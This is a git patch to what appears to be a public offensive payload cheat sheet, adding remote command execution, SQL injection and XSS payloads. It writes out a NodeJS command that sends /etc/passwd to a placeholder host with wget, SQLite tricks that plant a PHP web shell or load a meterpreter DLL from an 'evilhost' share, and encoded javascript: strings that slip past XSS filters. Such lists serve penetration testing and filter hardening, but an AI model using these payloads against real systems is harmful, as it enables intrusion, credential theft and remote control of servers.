From 2fa9683b8cceafdd340cfc842df8454d51b873e4 Mon Sep 17 00:00:00 2001
From: swisskyrepo <maxropelewski@gmail.com>
Date: Thu, 17 Nov 2016 10:50:34 +0700
Subject: [PATCH] Updated XSS,SQL,RCE

---
 Remote commands execution/README.md |  4 ++--
 SQL injection/README.md             | 15 +++++++++++++++
 XSS injection/README.md             | 14 ++++++++++++++
 3 files changed, 31 insertions(+), 2 deletions(-)

diff --git a/Remote commands execution/README.md b/Remote commands execution/README.md
index 1e4efc3..0603090 100644
--- a/Remote commands execution/README.md	
+++ b/Remote commands execution/README.md	
@@ -3,7 +3,7 @@ Remote code execution is a security vulnerability that allows an attacker to exe
 	
 
 ## Exploits
-Normal code execution
+Normal code execution, execute the command and voila :p
 ```
 cat /etc/passwd 
 root:x:0:0:root:/root:/bin/bash 
@@ -37,7 +37,7 @@ daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
 
 NodeJS Code execution
 ```
-require('child_process').exec('wget+--post-data+"x=$(cat+/etc/passwd)"+HOST')
+require('child_process').exec('wget --post-data+"x=$(cat /etc/passwd)"+HOST')
 ```
 
 ## Thanks to
diff --git a/SQL injection/README.md b/SQL injection/README.md
index 0c87aa0..9b29418 100644
--- a/SQL injection/README.md	
+++ b/SQL injection/README.md	
@@ -101,6 +101,21 @@ PostgreSQL Error Based - Basic
 ,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)
 ```
 
+# SQLite
+Remote Command Execution using SQLite command - Attach Database
+```
+ATTACH DATABASE ‘/var/www/lol.php’ AS lol;
+CREATE TABLE lol.pwn (dataz text);
+INSERT INTO lol.pwn (dataz) VALUES (‘<?system($_GET[‘cmd’]); ?>’);--
+```
+
+Remote Command Execution using SQLite command - Load_extension
+```
+UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--
+```
+Note: By default this component is disabled
+
+
 # Other usefull payloads
 
 Polyglot injection (multicontext)
diff --git a/XSS injection/README.md b/XSS injection/README.md
index a752bf5..7cdd819 100644
--- a/XSS injection/README.md	
+++ b/XSS injection/README.md	
@@ -99,6 +99,20 @@ javascript:prompt(1)
 %26%23106%26%2397%26%23118%26%2397%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2358%26%2399%26%23111%26%23110%26%23102%26%23105%26%23114%26%23109%26%2340%26%2349%26%2341
 
 &#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41
+
+We can encode the "javacript:" in Hex/Octal
+\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
+\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
+\152\141\166\141\163\143\162\151\160\164\072alert(1)
+
+We can use a 'newline character'
+java%0ascript:alert(1)   - LF (\n)
+java%09script:alert(1)   - Horizontal tab (\t)
+java%0dscript:alert(1)   - CR (\r)
+
+Using the escape character
+ \j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
+
 ```
 
 XSS with data: